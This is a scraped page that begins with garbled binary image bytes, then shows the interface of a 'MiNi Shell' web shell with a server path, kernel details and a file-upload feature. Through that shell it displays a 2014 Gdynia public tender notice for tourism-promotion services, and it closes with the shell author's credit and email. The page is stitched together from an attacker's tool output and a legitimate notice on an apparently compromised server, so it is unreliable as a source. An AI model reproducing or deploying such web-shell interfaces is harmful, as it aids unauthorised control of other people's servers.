JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140313/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140313/85030-N-2014.html

<p class="kh_header"><b>Gdynia: Opracowanie koncepcji i scenariuszy działań promujących miejskie produkty turystyczne wraz z realizacją przedstawionych działań: część 1 - szlak Legendy Morskiej Gdyni oraz część 2 - Gdyński Szlak Modernizmu</b><br>
<b>Numer ogłoszenia: 85030 - 2014; data zamieszczenia: 13.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Gdyni , Al. Marszałka Piłsudskiego 52/54, 81-382 Gdynia, woj. pomorskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie koncepcji i scenariuszy działań promujących miejskie produkty turystyczne wraz z realizacją przedstawionych działań: część 1 - szlak Legendy Morskiej Gdyni oraz część 2 - Gdyński Szlak Modernizmu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie koncepcji i scenariuszy działań promujących miejskie produkty turystyczne wraz z realizacją przedstawionych działań: część 1 - Szlak Legendy Morskiej Gdyni oraz część 2 - Gdyński Szlak Modernizmu.

1. CZĘŚĆ 1
Szczegółowy opis przedmiotu zamówienia obejmującego część 1:

1.1 Opracowanie koncepcji i scenariuszy działań promujących miejski produkt   turystyczny - Szlak Legendy Morskiej Gdyni uwzględniającej co najmniej:
1.1.1 Określenie grup docelowych odbiorców koncepcji 
1.1.2. Opracowanie działań PR w tym:
			a) media relations, 
			b) działalność wydawnicza, 			
			c) materiały reklamowe, 
			d) gadżety, 
			e) eventy
1.1.3. e-Marketing w tym prowadzenie strony internetowej www.legendamorska.pl w wersji polskiej i angielskiej (w tym utrzymanie na serwerze, jej aktualizacja, wypełnianie treścią, dodawanie fotografii, obiektów, atrakcji, plików video), promocja produktu na portalach społecznościowych, promocja produktu poprzez strony Partnerów, artykuły/reklama na regionalnych i ogólnopolskich portalach
1.1.4. Opracowanie i druk materiałów informacyjno - promocyjnych, w tym folderów w nakładzie co najmniej 3000 egzemplarzy w wersji polskiej i 1500 egzemplarzy w wersji angielskiej
1.1.5. Przygotowanie propozycji atrakcyjnych ofert w ramach realizacji miejskiego  
produktu turystycznego 
1.1.6. Przedstawienie oferty wydarzeń cyklicznych - co najmniej 5 wydarzeń w roku
1.1.7.Wskazanie Partnerów do realizacji działań promocyjnych
1.1.8.Opracowanie programu działań uwzględniających aktywność Partnerów
1.1.9 Opracowanie harmonogramu realizacji działań wraz z kosztorysem
1.1.10. Opracowanie scenariuszy działań.
1.2. Realizację działań promocyjnych wskazanych i opisanych w scenariuszach, o których mowa w pkt. 1.1.10.

2. CZĘŚĆ 2
Szczegółowy opis przedmiotu zamówienia obejmującego część 2:

2.1. Opracowanie koncepcji działań promujących miejski produkt turystyczny - Gdyński Szlak Modernizmu uwzględniającej co najmniej:
2.1.1. Określenie grup docelowych odbiorców koncepcji 
2.1.2. Opracowanie działań PR w tym:
			a) media relations, 
			b) działalność wydawnicza, 			
			c) materiały reklamowe, 
			d) gadżety, 
			e) eventy
2.1.3. e-Marketing w tym prowadzenie strony internetowej www.modernizmgdyni.pl w wersji polskiej i angielskiej (w tym utrzymanie na serwerze, jej aktualizacja, wypełnianie treścią, dodawanie fotografii, obiektów, atrakcji, plików video), promocja produktu na portalach społecznościowych, promocja produktu poprzez strony 	Partnerów, artykuły/reklama na regionalnych i ogólnopolskich portalach
2.1.4. Opracowanie i druk materiałów informacyjno - promocyjnych, w tym folderów w nakładzie co najmniej 3000 egzemplarzy w wersji polskiej i 1500 egzemplarzy w wersji angielskiej
2.1.5. Przygotowanie propozycji atrakcyjnych ofert w ramach realizacji miejskiego  
produktu turystycznego 
2.1.6.Przedstawienie oferty wydarzeń cyklicznych - co najmniej 5 wydarzeń w roku 
2.1.7. organizacji Weekendu Architektury (co najmniej 3 dniowego w miesiącu sierpniu 2014 oraz 2015 roku)
2.1.8.Wskazanie Partnerów do realizacji działań promocyjnych
2.1.9.Opracowanie programu działań uwzględniających aktywność Partnerów
2.1.10.Opracowanie harmonogramu realizacji działań wraz z kosztorysem
2.1.11. Opracowanie scenariuszy działań.
2.2. Realizację działań promocyjnych wskazanych i opisanych w scenariuszach, o których mowa w pkt. 2.1.11.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeśli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 usługi odpowiadające swoim rodzajem przedmiotowi zamówienia (przez co Zamawiający rozumie: realizację działań promocyjnych w oparciu o koncepcję zawierającą strategię działań promocyjnych) o wartości netto minimum 70 000 zł każda (dotyczy części 1, 2).  W przypadku składania oferty na część 1 i część 2 zamówienia, wystarczy wykazanie się wykonaniem dwóch usług o wartości minimum 70 000 zł każda. Wykonawca może polegać na wiedzy i doświadczeniu, innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne 	zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wstępna koncepcja działań promujących miejski produkt turystyczny - Szlak Legendy Morskiej Gdyni odpowiadająca zakresowi rzeczowemu przedmiotu zamówienia określonemu w II.1.4 pkt 1.1 ppkt. 1.1.1 -1.1.9 ogłoszenia, która winna być złożona w formie drukowanej w 1 egzemplarzu oraz na jednym nośniku elektronicznym - dotyczy części 1.
2. Wstępna koncepcja działań promujących miejski produkt turystyczny - Gdyński Szlak Modernizmu odpowiadającą zakresowi rzeczowemu przedmiotu zamówienia określonemu w II.1.4 pkt 2.1 ppkt. 2.1.1 -2.1.10 ogłoszenia, która winna być złożona w formie drukowanej w 1 egzemplarzu oraz na jednym nośniku elektronicznym - dotyczy części 2.
3. Formularz oferty - o treści odpowiadającej załącznikowi nr 1a do SIWZ- część 1 oraz /lub załącznikowi 1b do SIWZ- część 2.
4. W przypadku składania oferty przez wykonawców ubiegających się wspólnie 
o udzielenie zamówienia musi być załączone pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy prawo zamówień publicznych w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem.
5. Pełnomocnictwo do podpisania oferty, względnie do podpisywania innych dokumentów składanych wraz z ofertą, o ile prawo to nie wynika z innych dokumentów (np. aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji informacji o działalności gospodarczej) złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony. Pełnomocnictwo powinno być w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem.
6. Pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia 
w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu tych podmiotów - o treści odpowiadającej załącznikowi do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony ustalają, iż sposób realizacji i zakres przedmiotu umowy może ulec zmianie na uzasadniony wniosek Wykonawcy/Zamawiającego na następujących warunkach:
1.  w przypadku wstąpienia konieczności wykonania części usług innym sposobem niż założono - w sytuacji wystąpienia obiektywnych i niezawinionych przez Wykonawcę okoliczności, których nie dało się wcześniej przewidzieć,
2. wszelkie zmiany, o których mowa w pkt 1. wymagają pisemnych konsultacji Zamawiającego i Wykonawcy,
3. niewykonanie przez Wykonawcę części przedmiotu umowy będzie powodowało proporcjonalne obniżenie wynagrodzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.gdynia.pl/bip/uslugi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gdyni, Wydział Polityki Gospodarczej i Nieruchomości, Referat Promocji i Turystyki, ul. 10 Lutego 24, 81-364 Gdynia, pokój 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2014 godzina 11:00, miejsce: Urząd Miasta Gdyni, kancelaria na parterze ul. 10 Lutego 24, 81-364 Gdynia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie koncepcji i scenariuszy działań promujących miejski produkt turystyczny: Szlak Legendy Morskiej Gdyni wraz z realizacją przedstawionych działań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia obejmującego część 1:

1.1 Opracowanie koncepcji i scenariuszy działań promujących miejski produkt   turystyczny - Szlak Legendy Morskiej Gdyni uwzględniającej co najmniej:
1.1.1 Określenie grup docelowych odbiorców koncepcji 
1.1.2. Opracowanie działań PR w tym:
			a) media relations, 
			b) działalność wydawnicza, 			
			c) materiały reklamowe, 
			d) gadżety, 
			e) eventy
1.1.3. e-Marketing w tym prowadzenie strony internetowej www.legendamorska.pl w wersji polskiej i angielskiej (w tym utrzymanie na serwerze, jej aktualizacja, wypełnianie treścią, dodawanie fotografii, obiektów, atrakcji, plików video), promocja produktu na portalach społecznościowych, promocja produktu poprzez strony Partnerów, artykuły/reklama na regionalnych i ogólnopolskich portalach
1.1.4. Opracowanie i druk materiałów informacyjno - promocyjnych, w tym folderów w nakładzie co najmniej 3000 egzemplarzy w wersji polskiej i 1500 egzemplarzy w wersji angielskiej
1.1.5. Przygotowanie propozycji atrakcyjnych ofert w ramach realizacji miejskiego  
produktu turystycznego 
1.1.6. Przedstawienie oferty wydarzeń cyklicznych - co najmniej 5 wydarzeń w roku
1.1.7.Wskazanie Partnerów do realizacji działań promocyjnych
1.1.8.Opracowanie programu działań uwzględniających aktywność Partnerów
1.1.9 Opracowanie harmonogramu realizacji działań wraz z kosztorysem
1.1.10. Opracowanie scenariuszy działań.
1.2. Realizację działań promocyjnych wskazanych i opisanych w scenariuszach, o których mowa w pkt. 1.1.10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Atrakcyjność planowanych działań ujętych w koncepcji działań promujących miejski produkt turystyczny -Szlak Legendy Morskiej Gdyni - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie koncepcji i scenariuszy działań promujących miejski produkt turystyczny: Gdyński Szlak Modernizmu wraz z realizacją przedstawionych działań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia obejmującego część 2:
2.1. Opracowanie koncepcji działań promujących miejski produkt turystyczny - Gdyński Szlak Modernizmu uwzględniającej co najmniej:
2.1.1. Określenie grup docelowych odbiorców koncepcji 
2.1.2. Opracowanie działań PR w tym:
			a) media relations, 
			b) działalność wydawnicza, 			
			c) materiały reklamowe, 
			d) gadżety, 
			e) eventy
2.1.3. e-Marketing w tym prowadzenie strony internetowej www.modernizmgdyni.pl w wersji polskiej i angielskiej (w tym utrzymanie na serwerze, jej aktualizacja, wypełnianie treścią, dodawanie fotografii, obiektów, atrakcji, plików video), promocja produktu na portalach społecznościowych, promocja produktu poprzez strony 	Partnerów, artykuły/reklama na regionalnych i ogólnopolskich portalach
2.1.4. Opracowanie i druk materiałów informacyjno - promocyjnych, w tym folderów w nakładzie co najmniej 3000 egzemplarzy w wersji polskiej i 1500 egzemplarzy w wersji angielskiej
2.1.5. Przygotowanie propozycji atrakcyjnych ofert w ramach realizacji miejskiego  
produktu turystycznego 
2.1.6.Przedstawienie oferty wydarzeń cyklicznych - co najmniej 5 wydarzeń w roku 
2.1.7. organizacji Weekendu Architektury (co najmniej 3 dniowego w miesiącu sierpniu 2014 oraz 2015 roku)
2.1.8.Wskazanie Partnerów do realizacji działań promocyjnych
2.1.9.Opracowanie programu działań uwzględniających aktywność Partnerów
2.1.10.Opracowanie harmonogramu realizacji działań wraz z kosztorysem
2.1.11. Opracowanie scenariuszy działań.
2.2. Realizację działań promocyjnych wskazanych i opisanych w scenariuszach, o których mowa w pkt. 2.1.11.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Atrakcyjność planowanych działań ujętych w koncepcji działań promujących miejski produkt turystyczny - Gdyński Szlak Modernizmu - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com